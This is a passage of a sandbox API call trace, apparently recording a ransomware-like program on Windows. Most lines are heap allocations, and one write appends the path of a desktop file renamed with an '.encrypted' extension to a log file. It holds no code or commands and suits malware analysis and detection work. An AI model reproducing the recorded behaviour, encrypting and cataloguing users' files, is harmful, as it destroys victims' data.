RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.841] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.842] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.842] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.842] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.842] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x19e, lpOverlapped=0x0) returned 1 [0029.843] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.843] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x19e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.843] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.encrypted.ppt\r\n", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0029.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab338 [0029.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.encrypted.ppt\r\n", cchWideChar=62, lpMultiByteStr=0x7ab338, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.encrypted.ppt\r\n", lpUsedDefaultChar=0x0) returned 62 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.843] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3d, lpOverlapped=0x0) returned 1 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.843] CloseHandle (hObject=0x128) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.844] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.845] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.846] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.846] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.846] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.846] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.846] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.849] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 